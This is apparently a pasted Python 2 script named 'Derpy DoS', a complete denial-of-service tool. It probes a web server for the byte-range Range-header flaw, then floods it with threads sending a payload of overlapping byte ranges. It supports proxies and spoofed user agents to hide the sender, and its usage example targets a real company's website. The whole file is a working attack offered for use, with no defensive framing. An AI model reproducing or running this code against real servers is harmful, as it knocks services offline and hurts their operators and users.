[Python] Derpy DoS

1. #!/usr/bin/env python
2.  
3. import optparse, os, re, socket, threading, time, urllib, urllib2, urlparse
4.  
5. NAME = " "
6. VERSION = " "
7. AUTHOR = " Chris Poole | [email protected] | @codingplanets"
8. LICENSE = "This is licensed to elite hackers of the 1337 dark web"
9. HEADER = """
10. _____
11. | __ \
12. | | | | ___ _ __ _ __ _ _
13. | | | |/ _ \ |__| |_ \| | | |
14. | |__| | __/ | | |_) | |_| |
15. |_____/ \___|_| | |__/ \__| |
16. | | __/ |
17. |_| |___/ """
18. SLEEP_TIME = 3
19. RANGE_NUMBER = 1024
20. USER_AGENT = "Derpy(%s)" % VERSION
21.  
22. def attack(url, user_agent=None, method='GET', proxy=None):
23. url = ("http://%s" % url) if '://' not in url else url
24. host = urlparse.urlparse(url).netloc
25.  
26. if proxy and not re.match('\Ahttp(s)?://[^:]+:[0-9]+(/)?\Z', proxy, re.I):
27. print "(x) Invalid proxy address used"
28. exit(-1)
29.  
30. proxy_support = urllib2.ProxyHandler({'http': proxy} if proxy else {})
31. opener = urllib2.build_opener(proxy_support)
32. urllib2.install_opener(opener)
33.  
34. class _MethodRequest(urllib2.Request):
35. def set_method(self, method):
36. self.method = method.upper()
37.  
38. def get_method(self):
39. return getattr(self, 'method', urllib2.Request.get_method(self))
40.  
41. def _send(check=False):
42. if check:
43. print "(i) Checking target for vulnerability..."
44. payload = "bytes=0-,%s" % ",".join("5-%d" % item for item in xrange(1, RANGE_NUMBER))
45. try:
46. headers = { 'Host': host, 'User-Agent': user_agent or USER_AGENT, 'Range': payload, 'Accept-Encoding': 'gzip, deflate' }
47. req = _MethodRequest(url, None, headers)
48. req.set_method(method)
49. response = urllib2.urlopen(req)
50. if check:
51. return response and ('byteranges' in repr(response.headers.headers) or response.code == 206)
52. except urllib2.URLError, msg:
53. if any([item in str(msg) for item in ('Too many', 'Connection reset')]):
54. pass
55. elif 'timed out' in str(msg):
56. print "\r(!) Server seems to be choked ('%s')" % msg
57. else:
58. print "(!) Connection error ('%s')" % msg
59. if check or 'Forbidden' in str(msg):
60. os._exit(-1)
61. except Exception, msg:
62. raise
63.  
64. try:
65. if not _send(check=True):
66. print "(!) Target is not vulnerable"
67. else:
68. print "(#) Target seems to be vulnerable\n"
69. quit = False
70. while not quit:
71. threads = []
72. print "(#) Creating new threads..."
73. try:
74. while True:
75. thread = threading.Thread(target=_send)
76. thread.start()
77. threads.append(thread)
78. except KeyboardInterrupt:
79. quit = True
80. raise
81. except Exception, msg:
82. if 'new thread' in str(msg):
83. print "(#) Maximum number of new threads created (%d)" % len(threads)
84. else:
85. print "(!) Exception occured ('%s')" % msg
86. finally:
87. if not quit:
88. print "(#) Waiting for %d seconds to acquire new threads" % SLEEP_TIME
89. time.sleep(SLEEP_TIME)
90. print
91. except KeyboardInterrupt:
92. print "\r(x) Ctrl-C was pressed"
93. os._exit(1)
94.  
95. if __name__ == "__main__":
96. print "%s %s\n %s\n" % (NAME, VERSION, AUTHOR)
97. print "%s %s %s \n" % (HEADER, NAME, VERSION)
98. parser = optparse.OptionParser(version=VERSION)
99. parser.add_option("-u", dest="url", help="Target url (e.g. \"http://www.target.com/\")")
100. parser.add_option("--agent", dest="agent", help="User agent (e.g. \"Mozilla/5.0 Linux\")")
101. parser.add_option("--method", dest="method", default='GET', help="HTTP method used (default: GET)")
102. parser.add_option("--proxy", dest="proxy", help="Proxy (e.g. \"http://127.0.0.1:8118\")")
103. parser.add_option("--Example", help="python derpy.py -u http://apple.com --agent Mozilla/5.0 Linux --method GET")
104. options, _ = parser.parse_args()
105. if options.url:
106. result = attack(options.url, options.agent, options.method, options.proxy)
107. else:
108. parser.print_help()